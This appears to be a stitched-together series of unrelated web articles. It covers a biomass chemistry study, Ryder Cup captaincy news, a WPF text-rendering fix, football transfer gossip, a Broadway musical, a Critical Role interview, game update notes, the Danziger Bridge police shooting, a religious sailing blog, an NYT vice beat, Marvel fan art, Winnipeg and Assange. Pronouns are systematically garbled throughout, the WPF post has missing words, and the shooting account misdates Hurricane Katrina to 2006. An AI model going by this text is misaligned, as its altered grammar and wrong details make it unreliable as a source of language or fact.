The researchers found that to make the process work, it was necessary to precisely balance three variables: the amount of carbon dioxide, the amount of oxygen added, and the amount of methane relative to the amount of cellulose–a material derived from biomass. The mixture is fed into a high-temperature reactor that consists of a rhodium- and cerium-based catalyst. In the reactor, particles of cellulose are quickly converted into a liquid, which spreads over the catalyst, enhancing the reactions that lead to the production of hydrogen and carbon monoxide gases.
Paul Dauenhauer, a professor of chemical engineering at UMass Amherst, and one of the researchers involved in developing the new process, says a commercial version of the process could be set up near an existing natural gas power plant, which would provide ready access to methane and carbon dioxide. But the process isn't yet ready for commercialization. The researchers will need to demonstrate that it works with biomass, not just with cellulose derived from biomass. Biomass contains various contaminants not found in pure cellulose. Those contaminants could have a negative effect on the catalyst, and this could make it necessary to reengineer the reactor, they say. And there could be challenges scaling up the process, including ensuring that heat moves through the reactor the same way it does on a small scale.
Darren Clarke has been announced as 2016 European Ryder Cup captain
Darren Clarke has been announced as 2016 European Ryder Cup captain.
A five-strong selection committee – comprised of Paul McGinley, Jose Maria Olazabal, Colin Montgomerie, European Tour chief executive George O'Grady and tournament players' committee representative David Howell – revealed its decision at Wentworth on Wednesday.
The Ulsterman will be tasked with leading their continent into battle at Hazeltine as team Europe bids for a fourth consecutive victory over the United States.
Related: pictorial history of Darren Clarke in the Ryder Cup
The beleaguered Americans – who formed a task force last year in an attempt to fix their shocking recent record – have won only two Ryder Cups since 1999.
“I am naturally extremely proud to be selected as European Ryder Cup captain for 2016. The Ryder Cup has been a massive part of my life and my career, so to have the chance to lead Europe next year is a huge honour,” said Clarke.
“I am lucky to have played and worked under some fantastic captains in my seven Ryder Cups to date, and I look forward to the challenge of trying to follow in their footsteps and help Europe to a fourth consecutive victory at Hazeltine next year.”
Clarke was widely tipped to be the next captain and received support from at least eight of the 2014 European team before the committee made its selection.
It developed into a two-horse race between them and evergreen Spaniard Miguel Angel Jimenez in the lead-up to the the announcement, but the 51-year-old's limited English and inferior Ryder Cup playing record ultimately counted against him.
Golf Monthly Podcast Search for 'Golf Monthly Clubhouse' in your usual podcast provider to subscribe
“We are delighted to announce that Darren has accepted the invitation from the panel to captain Europe at The 2016 Ryder Cup at Hazeltine National,” said O'Grady, speaking on behalf of the panel.
“Darren has an impressive Ryder Cup pedigree having featured five times as a player and twice as a vice captain, so they have a strong understanding of the attributes required to be a successful captain.
“He is also a popular figure among the players and has both the passion and knowledge to lead Europe in the quest for a record fourth consecutive Ryder Cup victory.”
Clarke made their Ryder Cup debut in 1997 and represented Europe again in 1999, 2002, 2004 and 2006, just months after the death of their wife, Heather.
Indeed, scenes of the Northern Irishman saluting the crowd with tears streaming down their face after their singles victory over Zach Johnson at the K Club will live long in the memory.
In their five Ryder Cup appearances, Clarke was only on the losing side once (1999 at Brookline).
They boast a 10-7-3 record with a win percentage of 57.5% – one of the best since Europeans joined players from Great Britain and Ireland for the 1979 contest.
The 2016 European Ryder Cup captain was also a vice-captain at the 2010 and 2012 Ryder Cups.
Randomly Disappearing Text
Excessively Blurry Text
Solution
If you found this article useful, could you hit any of the share buttons below, so that others can benefit from it, too? Thanks!
Good text rendering has always been one of the cornerstones of good usable UI . This is even more important today with minimalistic trends in UI design such as Metro and Material design. It comes as no surprise then that Microsoft has paid special attention to text rendering in WPF . I have been happily using WPF for many years and haven't run into any serious problems/quirks with text rendering so far. This changed recently when I was helping a customer of ours debug some text rendering problems in their application. I had to spend some good time tracking things down, but it ultimately helped me to better understand text rendering in WPF. I will try to share what I have learned in this article. One of the improvements which the text stack update in WPF4 brought was the TextOptions.TextFormattingMode attached property. There is an excellent in-depth read on this topic in this MSDN blog post . If you are curious as well about the other improvements you can read even more here . Back to our client's project. They were using Telerik's RadDiagram component and ModernUI library. They reported having numerous issues with text disappearing and looking very blurry when changing the zoom level on the diagram component (which basically just applied a ScaleTransform render transformation ). After investigating the issue the culprit turned out to be the combination ofand ScaleTransform. It turns out that the ModernUI library resets the TextBlock's TextFormatting option toinstead of the framework default of. Apply a relatively braveon text with thatsetting and you have yourselves some problems:Consider the following simple XAML code which will allow you to observe the issue: We have aelement with a large font-size say 120pt. I have applied a ScaleTransform to this text using the Slider control. Trying to zoom out the text (i.e. apply a ScaleTransform in order to shrink the size of the container Grid) will cause it to disappear at one point:Consider almost the same XAML fragment with a small modification: Here we have reduced the font size to 12pt and will be doing zooming in (using the ScaleTransform in order to increase the size of the container Grid). This is the result of zooming operation:The solution as you may have already guessed is very simple - seton the TextBlock element. This is the WPF framework default and you usually will not be seeing these issues unless a parent container overrides it (such as ModernUI). Please, don't take this as a rant against that framework or it's author. It is an excellent framework and contribution to the WPF community. They probably did it with a good reason - as we have seen from this article it is sometimes recommended to use the "Display" mode - especially with small text. The nature of this mode is to try to snap the text rendering to the device screen pixels which is most likely the reason for the above quirks. Hopefully you now know the solution if you ever run into these quirks! Thank you for reading and as always - Happy Coding!
Just months after joining Monaco for €45 million from Atlético, Falcao has been offered to Real Madrid. The Colombian feels let down by the regime led by Russian multimillionaire Dmitry Rybolovlev, not helped by their €14 million salary possibly being cut in half by the tax changes proposed by François Hollande's government.
After snapping up Falcao, Moutinho and James Rodríguez, Rybolovlev pulled the plug on any additions to this transfer spree in light of Ligue 1's determination to force Monaco's players to pay the top tax rate in France. At present, the club's foreign players benefit from the special tax-free conditions applicable in the Principality.
This is when Ranieri's side stopped splashing the cash, instead capturing Carvalho and Abidal on free transfers and securing loan deals for Fabinho and Sampdoria goalkeeper Romero.
Falcao feels they were recruited under false pretences, having signed a contract supposedly worth €5 million more than their next best offer and been assured that the club would be assembling a star-studded squad. With both of these pledges now up in the air, they want to leave Monaco before the transfer window slams shut on 2nd September.
The first club Falcao was offered to was Real Madrid, which had sized them up when José Mourinho was in charge. However, although the dressing room would have welcomed them with open arms, 'Los Blancos' president Florentino Pérez said no, arguing that the Gareth Bale deal is too far down the line.
As it is, Mourinho could hold the key to Falcao's future. 'El Tigre' could be a good fall-back option if Chelsea fails to prise Wayne Rooney away from Manchester United, while the Red Devils could fancy the Colombian to replace the Englishman if they do leave.
Watch Cast of Come From Away Perform “Me and The Sky!”
Buy Tickets to Come From Away
The new musical is currently in previews at the Gerald Schoenfeld Theatre.
The cast and orchestra of the new Broadway musical Come From Away performed the song “Me and The Sky!” in Studio Q at CBC Radio; the performance can be viewed above.
Come From Away, the new rock musical that explores the lasting connection forged between a group of travelers whose planes were diverted to a small Newfoundland town by the terrorist attacks of September 11, 2001, began Broadway previews February 18 at the Gerald Schoenfeld Theatre, where it is scheduled to open March 12.
The musical arrives in New York after playing tryouts in Toronto, Washington, D.C., Seattle Repertory Theatre, and La Jolla Playhouse.
Come From Away features book, music, and lyrics by the Canadian husband-and-wife team Irene Sankoff and David Hein (My Mother's Lesbian Jewish Wiccan Wedding). Tony Award nominee Christopher Ashley (Memphis) directs.
The cast includes Tony Award nominee Chad Kimball, as well as Petrina Bromley, Geno Carr, Jenn Colella, Joel Hatch, Rodney Hicks, Kendra Kassebaum, Lee MacDougall, Caesar Samayoa, Q. Smith, Astrid Van Wieren, Sharon Wheatley, Josh Breckenridge, Susan Dunstan, Tamika Lawrence, and Tony LePage.
Here's how it's billed: “In a heartbeat, 38 planes and 6,579 passengers were forced to land in Gander, Newfoundland, doubling the population of one small town on the edge of the world. On September 11, 2001 the world stopped. On September 12, their stories moved us all.”
The creative team includes Ian Eisendrath, music director; Kelly Devine, choreographer; Beowulf Boritt, scenic design; Toni-Leslie James, costume design; Howell Binkley, lighting design; and Gareth Owen, sound design. Music supervision is by Ian Eisendrath, and orchestrations are by August Eriksmoen. Casting is by Telsey + Company.
Visit Comefromawaythemusical.com.
For tickets, visit Telecharge.com, or phone (212) 239-6200. The Schoenfeld Theatre is located at 236 West 45th Street, NYC.
LOVE MUSICALS? CHECK OUT PLAYBILL STORE FOR MERCHANDISE!
Is it Thursday yet? Yes, it is! That means another Critical Role interview before tonight's new episode. This week, we're picking Laura “Vex'ahlia” Bailey's brain to find out what makes them tick (spoiler: it's gold). Laura's vocal credits include Black Widow in Marvel's Avengers Assemble, Fiona in Tales From the Borderlands, and Jaina Proudmoore in World of Warcraft.
Tell us a little bit about yourself and who you play?
I play Vex'ahlia, the half-elf Ranger. They pretend to be strict and no nonsense, but really she's just a big softy who wants to find their place in the world.
Did you have the idea for Vex first, or did you build them around the ranger class?
Well originally I wanted to be a half-elf rogue, but Liam claimed that before I could. Punk. But they and I share a birthday in real life, so we decided to go with it and make our characters twins. Once that was established, I decided I HAD to have a companion animal. We started our original campaign in Pathfinder, and in that system, both the druid class and ranger class can have a battle pet. But inevitably, ranger won because… arrows. As we rolled for stats, I put most of my points in things like charisma and dexterity because I wanted to play them as someone who could talk their way out of most situations. I figured that with their brother being the sneaky thief that they are, she's grown up needing to distract people while they snagged their coin purses or snuck into rooms they aren't supposed to, so she's a pretty persuasive talker. But they still tend to feel uncomfortable when in big groups; they definitely are more accustomed to being alone. Since they and Vax got used to hiding out in their teenage years and barely scraping by, they tend to hold onto money when they find it. She's never fully convinced they won't find themselves alone and stranded again.
How did you develop Vex'ahlia's backstory?
Liam and I developed it together over coffee. I think it was a two hour meet up where we reverted back to our five year-old selves and very seriously just made a bunch of stuff up. It's actually pretty funny how in sync we were with what we decided for our mom and dad. Outside of that, other bits and pieces started sorting themselves out in my mind the more we played. I remember the game I decided where my wonderful Trinket came from. All I had originally said is that Vax was always stealing little trinkets for themselves and Vex named them bear that as a joke, because they wanted a trinket of their own. But as I grew more attached in the game, it seemed so wrong to not have a backstory for him. So I spent an evening writing down exactly how I had acquired him, and sent the short story to Matt. Only just recently did I let anyone else even read it… it just felt so personal.
Is it awkward playing on camera?
Honestly, most of the time now I forget the cameras are even there. Which can be dangerous, because sometimes I catch myself making a really stupid face or picking at my teeth or flaring my nostrils. During the first couple episodes, I felt really self-conscious anytime I would think about it, but now I've pretty much just given up on trying to control my expressions. It's so impossible to not get wrapped up in Matt's story telling.
Image credit: Geek and Sundry
All of you do voices for your characters. Do you do this because you're voice actors or do you think you would do them anyway? Do they get you into character?
It's just something that happened the first time we started playing. I'm not sure if it's because of our background in voice acting or not, but the first time I opened my mouth to speak in the game, Vex's voice just came out. I remember Liam and Travis both looking at me with these comical expressions because none of us had decided to speak in character and I was the first one to strike up a dialogue with an NPC. And then Matt leaned forward and started talking (I think they were a mercenary in a bar) and we were all hooked.
Who's your favorite NPC or enemy you've encountered?
I really love the creepy hag lady who Tiberius traded their luck to. My idiot brother traded a favor as well. They showed up in our game before we started filming the show. They were in this underground hideaway all covered in rags seeming like this weird old woman… and then they stood to their full height and we realized they were so much more than we bargained for. We almost had to fight her, and I'm so glad we didn't because, even though it freaks me out and I'm sure no good will come of it, I really want to see what their influence will do to the party.
What's the greatest move you think you've made in the game?
Oh man, I think I'm gonna have to go with the double crits I got during our showdown with the Briarwoods. I was prepared to die to defend Vax (and almost did, I later realized) and it was just so crazy that those two powerful blows happened when they did in relation to what was going on story wise. I'm really excited about Trinket's cannonball move too. Hoping I'll be able to put that to good use in the future.
How does the game leak into your daily life?
Brushing teeth. *worried about Vax* Stuck in traffic. *worried about Vax* Eating lunch. *worried worried worried* #CriticalRole — Laura Bailey (@LauraBaileyVO) September 21, 2015
There's not a day that goes by that I don't think about the game. Obsess is probably the right term, yeah. I stress so much when someone in the group is in trouble, or if I think our characters are fighting. When Tiberius freaked out during our fight with Ka'Vaarn, I lost sleep. When we spent that whole week thinking Vax was a goner? Oh man, I was a wreck. And now?? We have the city council thinking we're criminals and I literally lay in bed wondering what I can say to persuade Uriel to listen to reason. It's so ridiculous.
There was a… moment during Grog's rematch. You surprised everyone by flashing and screaming “I love you, Grog!” This feels very un-Vex like. Is there subtext here? Inquiring minds want to know!
Haha! You know what's funny, I kinda surprised myself with that one. Look at it this way: Vex. Loves. Money. It's no secret. So when that much gold was on the line, Vex became very passionate about winning. And I love that as the battle went on, they just got more and more invested. They were kinda gold raging.
If Trinket could talk, what do you think they would say about your adventures? About your party?
Well, there are spells that allow them to have a voice. I almost took the spell speak with animals recently because then I'd be able to have conversations with them whenever I wanted. But, in the end that felt kinda selfish. We don't have a healer in the group right now, so it seemed more necessary to take cure wounds. Keyleth might have spells that can turn them human and that can make them smarter though. How crazy would that be? It's like if your dog or cat could suddenly speak. They've seen some pretty intimate moments in your life, ya know? Eep. Hopefully he'd say nice things. They might have a few choice words for Scanlan though.
How has Critical Role changed since inception?
You know, it's so weird… when Matt first told us that Geek & Sundry was interested in having our campaign on the Twitch channel, I was a little apprehensive. I thought it might change the way we play, or that I'd be really uncomfortable having the cameras on us the entire time. But outside of our seating arrangements, it's all pretty much the same. We still goof off as much as we used to: we still have Burt Reynolds popping up to save the day, and Tiberius bumbling their way into precarious situations, and Grog being… Grog. I guess the biggest difference is being able to share what was inside our brains for so long with so many awesome people. It still blows me away after every show when I log onto Twitter and scroll through the hundreds of #CriticalRole tweets and see the amazing fan art. It's just so crazy how so many people can picture these scenarios exactly the same way. It's like this world we're creating actually exists and everyone watches has this special pass to see through a portal to it.
Tune in to Critical Role tonight at 7pm PST on Geek & Sundry's Twitch Channel, or catch it on our website next Monday.
Feature image credit: Geek & Sundry
Greetings all,
We're in the home stretch for Early Access 4, so we wanted to share an early look at some of the changes coming. These are not the only changes -- not by a long shot -- but they were some of the easier to show off in screenshots. Let us know what you think.
Diplomacy
It is now possible to view diplomatic information for a race while in the audience screen.
https://scontent.fsn...397984184_o.jpg
Espionage
A mission queue has been added, along with a new Steal Charts mission. Acquire Data now also reveals all of the current colonies of the target race.
https://scontent.fsn...050060058_o.jpg
Galaxy Map
Additional wormholes have been added during galaxy generation for Large and Huge Circular maps. We've also updated the galaxy art. One of the goals here is to make the systems near the galaxy core easier to see.
https://scontent.fsn...569827035_o.jpg
Game Setup
New options have been added for Starting Age (3 choices), Production Speed and Population Growth Speed.
https://scontent.fsn...377800560_o.jpg
Ship Design
Blueprint upgrades now take place within the ship designer, allowing you to see how the upgrade will affect your ship. We have also brought back many of the good elements from the previous iteration of the ship designer, like clicking on a slot to add an item.
https://scontent.fsn...299446418_o.jpg
Gallery Folders
Search Gallery Jigoku no Fubuki theCHAMBA 745 BIG TROUBLE IN LITTLE CHINA #22 cover theCHAMBA 556 SFV - Necalli theCHAMBA 475 Advertisement Advertisement SFV - Birdie theCHAMBA 292 They theCHAMBA 846 SFV - Charlie theCHAMBA 547 SkratchJams - OC4 - Ebi theCHAMBA 98 BIG TROUBLE IN LITTLE CHINA #21 cover theCHAMBA 726 ChipperChapChat 'Jessica Jones' Spoiler review theCHAMBA 51 Consecutive Normal Punches theCHAMBA 1,002 Teacher and Students theCHAMBA 378 Senritsu no Tatsumaki theCHAMBA 542 ChipperChapChat - Episode 24 theCHAMBA 241 ChambaPatreonMashUps - TotoROCKET theCHAMBA 825 ChambaPatreonMashUps - BANEmax theCHAMBA 491 ChipperChapChat episode 23 theCHAMBA 42 ChambaPatreonMashUps - Mr Incredible HULK theCHAMBA 668 ChambaPatreonMashUps - KrilLINK theCHAMBA 686 ChambaPatreonMashUps - MAkuma theCHAMBA 1,620 SJ - Midnight Bliss Rival Schools theCHAMBA 137 ChambaPatreonMashUps - AkuMAKO theCHAMBA 355 ChipperChapChat episode 22 theCHAMBA 131 ChambaPatreonMashUps - Dr.DoomsDay theCHAMBA 891 ChambaPatreonMashUps - Colossus Titan theCHAMBA 379
Spread the love
New Orleans, LA – Four former New Orleans Police Department (NOPD) officers pleaded guilty on Wednesday to gunning down innocent, unarmed civilians in the days following Hurricane Katrina, while a fifth officer confessed to covering up the unjustified shooting. Although the ex-cops previously received sentences ranging from 6 to 65 years in prison, their new trial and plea deal resulted in reduced sentences ranging from 3 to 12 years with credit for time served.
On September 4, 2006, six days after Hurricane Katrina hit New Orleans, five members of the Bartholomew family along with their friend, 17-year-old James Brissette, were walking across Danziger Bridge when a Budget rental truck loaded with plainclothes cops approached them. Armed with shotguns and assault rifles, the NOPD officers immediately exited the vehicle and opened fire on the Bartholomew family without warning.
Although Brissette was unarmed and had not committed a crime, the cops shot the innocent teen to death as the Bartholomew family ducked behind a concrete barrier. Shot in the arm, Susan Bartholomew later had to have their limb amputated. Them husband, daughter, and another friend survived the ambush but received multiple bullet wounds. Them son remained unharmed by escaping under the bridge.
While walking down the bridge to visit their brother, Lance and Ronald Madison witnessed the cops sadistically gunning down the unarmed family when the NOPD officers began shooting at them. As the brothers fled back across the bridge, several officers jumped into an unmarked car driven by a State Trooper. With the vehicle in pursuit, Officer Robert Faulcon leaned out the window and shot Lance's 40-year-old developmentally disabled brother, Ronald Madison, in the back with a shotgun. According to their autopsy, Ronald Madison sustained seven bullets wounds including five in the back.
After watching their brother die for absolutely no reason, Lance Madison was falsely arrested on eight counts of attempted murder of a police officer and held in police custody for three weeks before NOPD suddenly released them without charges. Although no weapons were found at the scene, the officers involved decided to cover up the unjustified shooting by falsifying numerous police reports and planting a gun at the scene.
Responding to a call regarding shots fired in the vicinity near Danziger Bridge, the police opened fire on an innocent family walking toward a grocery store in search of food and water. Later investigations revealed that the initial reports of gunfire before the callous murders came from desperate residents trapped by floodwater who had fired their guns to attract the attention of rescue workers.
On December 28, 2006, a grand jury indicted seven NOPD officers on charges of murder and attempted murder. Sgt. Kenneth Bowen, Sgt. Robert Gisevius, Officer Anthony Villavaso, and Officer Robert Faulcon were charged with first-degree murder, while Officers Robert Barrios, Michael Hunter, and Ignatius Hills were charged with attempted murder for their roles in the shooting. Less than two years later, Judge Raymond Bigelow tossed out the state's case after blaming a prosecutor for improperly using the cops' grand jury testimonies to secure indictments.
In July 2010, Bowen, Gisevius, Villavaso, and Faulcon were indicted on federal murder charges for killing Brissette and Madison, while retired Sgt. Gerard Dugue and Sgt. Arthur Kaufman were charged with covering up the killings despite the fact that they had been assigned to investigate the police shooting. On August 5, 2011, Bowen, Gisevius, Villavaso, and Faulcon were convicted on multiple counts of civil rights violations, conspiracy, and obstruction of justice. They received prison sentences ranging from 38 to 65 years.
Kaufman was convicted on several counts of falsifying records in a federal investigation, conspiracy, false statements, and civil rights conspiracy for false persecution. They were sentenced to six years in prison while Dugue was granted a severance and is awaiting retrial.
After the five officers appealed their convictions, U.S. District Judge Kurt Engelhardt decided to grant them a new trial while citing “grotesque prosecutorial misconduct.” Engelhardt decided to toss their convictions out after discovering that senior prosecutors from the U.S. Attorney's Office had anonymously posted comments on Nola.com articles related to the trial.
On Wednesday, the five defendants agreed to plead guilty in exchange for drastically reduced sentences. Instead of serving 65 years in prison for shooting a mentally disabled man in the back, Faulcon agreed to serve 12 years. Instead of spending 40 years in prison for gunning down an innocent teen and nearly killing a family, Bowen and Gisevius both received 10 years. Villavaso's sentence was reduced from 38 years to 7 years while Kaufman's prison sentence went from 6 years to 3 years with time served. Except for Kaufman, the other four cops will receive credit for six years of time served.
“This has been a terrible ordeal for our family, friends and the community,” Lance Madison told WWLTV. “We are glad the officers involved have finally admitted their guilt. I pray that no other family will ever have to go through what we have gone through.”
***Warning—Do not read if you are queasy about bodily fluid descriptions***
Last week, I took my son-in-law and two young grandkids sailing. The weather was picture perfect. The sky was overcast, making for an uncommonly pleasant temperature. Low humidity. No rain. Manageable wind speed…that wouldn't frighten the little ones…or the big ones.
My son-in-law, Marshall, is determined to master the fine art of sailing. Most of the day they were at the helm. Did a great job. As the captain, they managed everything. The jib, the tiller, the mainsail, the commands….and even the capsizing. That's right, they tipped us over. Of course, we blamed it on….Benson, our intrepid three year old passenger. As we joked that it was all their fault, they quickly and proudly claimed the credit. Tipping a catamaran over can be traumatic to kids with no sailing experience. But, Benson was totally unfazed. Bright-eyed and smiling wide, they played in the swells as Dad and Granddad worked to upright the boat.
At one point, we were about an hour away from the beach. My little three year old grandson said to their dad, “I need to go potty.” Dad calmly replied in almost a whisper, “Let's use the stealth method.” My six kids were all girls. So, I wasn't sure what the stealth method was. I assumed it meant to go into the bushes. Well, in the middle of Galveston Bay, there are no bushes. Holding onto the windward shroud, little Benson stood up and started fumbling awkwardly with their clothes.
OK! Now it was time for the experienced sailor to jump to the rescue. From sad and comical experience, I know what happens when any fluid is flung into the wind. Moving air is merciless. It flings the fluid right back onto you and anyone else behind you. Marshall and I were both downwind.
Before any unfortunate accident could occur, I moved the little one to the back of the trampoline on the leeward side. Now, Benson could water the seawater without the captain and their coach being splattered.
Pissing Into the Wind
Yesterday, I met a good friend for lunch. He's a member of my ward (Congregation). I really like this guy. Have a great deal of respect for him. They were my very first bishop when I moved to Houston 40 years ago.
We got talking about the state of my faith and my current activities. They were very complimentary about the Talkeria. They feel it is a great example of following Christ's commandments to reach out in a spirit of love and charity. Coming from him, it meant the world to me.
But, they also had a caution. They said this, “Sam, what you are doing, by voting opposed, is just PISSING INTO THE WIND.” I'm not sure exactly what they meant. But, I'm a sailor. To me, “pissing into the wind,” brings a certain image to mind. Not a pleasant image. An image of bad stuff coming back at you.
Excommunication?
It turns out that this vision of “pissing into the wind” was pretty apt yesterday. Two people, whom I love and know well, predicted that I'm going to be excommunicated. I'd heard comments like this before, but not from anyone close. It hit a little hard.
Now, I don't think that I'm doing anything to warrant expulsion. I love Jesus. I love my church. I have great respect for its leaders. It saddens me that so many of my friends and family are leaving or have already left.
So, I may be “pissing into the wind.” Unfortunate things might come back and bite me. Never-the-less, my determination and commitment is to follow the teachings and example of Jesus Christ. If I were being excommunicated for seeking to obey the Savior's commandments and to keep my temple covenants…so be it. After all, Jesus, Himself, was executed for their determination to follow the commandments of Their father.
Pissing Into the Wind—The Next Steps
Saturday, October 1st, all members of the Church of Jesus Christ will have a sacred opportunity to serve the Lord and Their church. Once again, They will publicly exhibit Their trust in the general church membership. They have commanded the apostles to ask for our opinion….to ask for our approval or disapproval. In preparation for that pivotal event, here are four steps I plan to take in the next few days.
Post on my blog a call to seriously consider what each of us is going to do when this holy vote is called for. Compose an e-mail which will explain to my Stake President and Bishop why I voted the way I did. Post that e-mail here, so others can access, modify, and use, if they so desire. Compose a petition of sorts. Not actually a petition, but, more like a register. If a person chooses to vote in disapproval, they could record it here. It's likely that only one name will be recorded on the register…mine. And…that's just peachy with me.
The New York Times sexed up its local coverage this weekend with a long and in-depth story, featured on the front page of the Sunday metro section, on an underground strip club-cum-brothel in the city. The article, titled “A Strip Club in Manhattan Proves That Vice Is Hard to Kill,” was written by Times reporter Mosi Secret, who now covers sin and vice in all its permutations, a newly minted beat conceived by city editor Dean Chang.
“I always thought that one of the more compelling things you could ever cover in New York was sin,” Mr. Chang told the Observer. Mr. Chang worked for 17 years as a reporter and editor at the Daily News before moving to the Times in 2008. “You could have a franchise on sin working there,” Mr. Chang said of the News. “At the Times, it's sort of different.”
Naturally, the article and the new beat caused a stir on social media platforms, most notably among journalists, who expressed their envy and surprise that such a beat could exist and noted that Mr. Secret has the perfect name for their position.
But Mr. Chang said they didn't come up with the beat to provoke. “This is not an excuse to suddenly run titillating stories in the New York Times,” Mr. Chang explained. The idea, they said, was “to cover things, places, issues that wouldn't naturally have a voice in the metro section.”
They initially floated the idea past their colleagues, including Wendell Jamieson, the paper's metro editor, and when it was approved, they settled on Mr. Secret, who's worked at the Times since 2010, for the position.
“We wanted to give them something that they could really sink their teeth into,” Mr. Chang said.
A former reporter at ProPublica and alternative weeklies, Mr. Secret had been tasked to cover federal court in Brooklyn before they moved on to the paper's scintillating new beat, which is to say, they were ready for a change.
“This is probably the most fun I've had at the Times,” Mr. Secret told the Observer.
While Mr. Secret was attracted to the opportunity for the obvious reasons—who wouldn't want to cover sin and vice for the Times?—he said he's not an “adrenaline junkie.”
“I'm not that kind of reporter,” Mr. Secret said. “I do enjoy observing and thinking deeply about the things I see. I also enjoy crafting language, and this assignment allows me to do that.”
 They are looking forward to getting out into the streets and working on a beat that affords them the opportunity to do long-form, narrative features, which they excel at, according to Mr. Chang. (Mr. Secret recently published a long piece in the Times Magazine on Brownsville.)
Mr. Secret was reluctant to reveal what he's working on but mentioned that they have a number of stories in the works. The beat will focus both on sin's seedier side (prostitution, for instance, the subject of their first article) and its more upscale counterpart—high-stakes poker, say. Mr. Secret plans to stay on the beat for about a year, they said.
In the meantime, it's still a “work in progress,” said Mr. Chang, who is figuring out how to direct the coverage of sin without encroaching on other beats at the paper. “Murder is a sin but it's also a crime,” Mr. Chang said, “so it's likely that that would be covered by our other beat reporters.”
Mr. Chang also noted that while the inaugural article was well received, some readers were surprised it ran in the paper, given the subject matter (though Maureen Dowd may have softened longtime Times readers to the idea of vice with their pot-infused dispatch from Denver's front lines today). Ira Stoll, for one, who writes the blog Smarter Times, took issue with the fact that the article “leaves several questions unanswered,” such as the name of the lawyer who introduced Mr. Secret to the strip club. “The whole story is quite un-Timeslike,” Mr. Stoll concluded.
Mr. Chang defended the article and said they have no regrets about running it. “There are a lot of opinions about what makes a good New York Times story, and not everyone's going to agree,” Mr. Chang said. “But I feel very strongly that what we did was a Times story in every way.”
Given the name of the beat, though, did Mr. Chang view the new coverage as a way to move in on the territory of magazines like Vice, which offers in-depth, alternative and often, yes, titillating examinations of society's darker underbelly?
“No,” Mr. Chang said, “we're going straight for Playboy's readership.”
God bless Tumblr for granting me the one thing I didn't know I needed: evening dresses based on Marvel Avengers and villains. While Disney might have the market on wedding dresses, these kickass Marvel gowns are the product of tumblr artist unidentifiedspoon.
These fall into one of my favorite type of fanart, which is where they call to mind the characters, but still have a lot of style. Above is Tony Stark a.k.a. Iron Man.
While I'm not sure that the puritanical Steve Rogers would be caught in something with such a daring neckline, this Captain America look still has the same American spirit as its namesake, while bringing a bit of the evening gown elegance.
This Thor dress is a little too on the nose for me, but if you were going to an evening event with your LARPing crew, this is definitely the dress for you.
Since we're going full gender bend, it would've been really awesome to see an evening look for a man on Black Widow, but this is still pretty fantastic. Relatively understated, but with a great power suit style blazer on top, and that garter knife for the deadly sex appeal part of Black Widow.
While you can get all the sex appeal you'll ever need from the Hawkeye Initiative, this dress is still pretty sweet. And the boy cut is pretty rocking.
One of my favorite pars of the Hulk concept is the way it looks like its been pulled together. That sort of looks feels rather reminiscent of the whole, turning into a huge green rage monster and losing all of your clothing and then turning back into a person again.
I wasn't entirely sure who the Enchantress was, but she's a villain from the Thor series with whom Thor had an on-again, off-again relationship.
Somewhere between avant-garde fashion and the same LARP fest as the Thor dress, this Captain American villain looks amazing in evening dress form.
This Pyro evening look is like a galaxy on fire.
I am new to Winnipeg. Other than a six-month stint last year, this is basically the first time I have lived in this city. Okay, so I guess it's fair to say that I'm not new to Winnipeg. That first line was misleading. To clarify, this is my first time permanently living in this city. In July of 2012, we arrived in Winnipeg after living in the Middle East for five years, where my wife is originally from. I was born and raised in Thunder Bay but lived in Edmonton for a number of years, so am not new to the prairies. “Ya, I may be new here, but I've been around. I know your type, Winnipeg.” Is that what I was saying?
Growing up in Thunder Bay, Winnipeg was considered, and is still considered by many, to be “The Big City,” a label that many Winnipegers would most likely literally laugh out loud at. But to us in Thunder Bay, this was and is the place to go for concerts, getaways, and shopping. Polo Park was this amazing destination with tons of shops, at least when I was a kid, and at least to me. That changed for a lot of people with cities like Minneapolis that are a bit closer started opening giganto-megalo malls filled with more junk and needless items than we could possibly bring across the border. We're a fickle bunch in Thunder Bay.
The first time I went to an IMAX film was at the theater in Portage Place downtown. I don't remember the name of the film or what it was about or even when it was. I think it was about tornadoes. Or space. Or tornadoes in space or something? Hey, I didn't say I had a good memory. I just remember the actual act of going there and thinking, “My, that screen is large”
I do remember telling an old boss of mine that I was going for a weekend trip to Winnipeg one time years ago, and they said, “Watch out for the curb stompers” in a very serious way. Apparently, the big, bad gangs of Winnipeg would attack and bash the side of your skull against the curb…and then stomp on it. That scared me a tad. I don't think they were joking, strangely. I think they sincerely feared I would have my head stomped in. Fortunately, that has not happened to me yet, knock on wood.
So being in Winnipeg is a bit surreal in an odd way (which I guess is what surreal is to begin with). At this point in my life I have lived in some larger and more, um, non-Winnipeg-ish cities. But there is still a bit of this mystical, grand feel about Winnipeg, like I am in a place that in my childhood was elevated to a certain level of excitement and wonder, as it most definitely was. This is Winnipeg. It's not Thunder Bay! There are MORE people here! There are tall buildings with shiny glass! There is an Old Spaghetti Factory!
So what is my impression as I become more familiar with the place? Well, this is a cool city that I think too many people in Winnipeg take for granted. I mean, the winters are absolutely brutal and I hate every second of them, but on the positive end I love how incredible the arts and culture scene is. There are a ton of great bands here, a ton of good venues, tons of galleries, tons of restaurants, tons of Sun Newspaper boxes (okay, that's more on the downside), tons of festivals and there really is a ton of things to do. It's a very heavy city, man. Ya, it's a bit isolated but I think that it has helped to create a unique local culture that is pretty exciting if you ask me. It's a blue collar hippy hipster town where everyone sort of knows everyone and a lot of people have tattoos. Okay, okay, so it's unique in a way that I can't actually describe well. It's a feeling, man, it's not something you can see.
This is a good city to be in and I'm enjoying getting to know it better. As with all cities it has its downsides, its challenges and its frustrations. It's not a perfect utopia filled with mermaids and unicorns, but for what it is, it's pretty damn fine. I think I'm going to like it here. But I'll never be convinced that whoever invented -40 was anything but a complete, sadistic jerk.
__
Chris Hearn writes and posts videos for Spectator Tribune.
For more, follow us at @spectatortrib
Swedish prosecutors to question Julian Assange in Ecuador's London embassy
By Paul Mitchell
15 August 2016
Swedish prosecutors will question Julian Assange inside the Ecuadorian embassy in London.
The WikiLeaks founder and editor has been trapped there since being granted asylum four years ago this month.
Assange is wanted on trumped-up “minor rape” allegations, which were revived by the Swedish state in September 2010, having been earlier dropped as groundless, in order to provide the legal justification for their extradition to Sweden. Once there, Assange fears they will be extradited to the United States where a sealed Grand Jury indictment involving espionage charges is awaiting him.
The United Nations Working Group on Arbitrary Detentions (UNWGAD) earlier this year declared, “If Mr. Assange leaves the confines of the Embassy, they forfeit their most effective and potentially only protection against refoulement to the United States of America.”
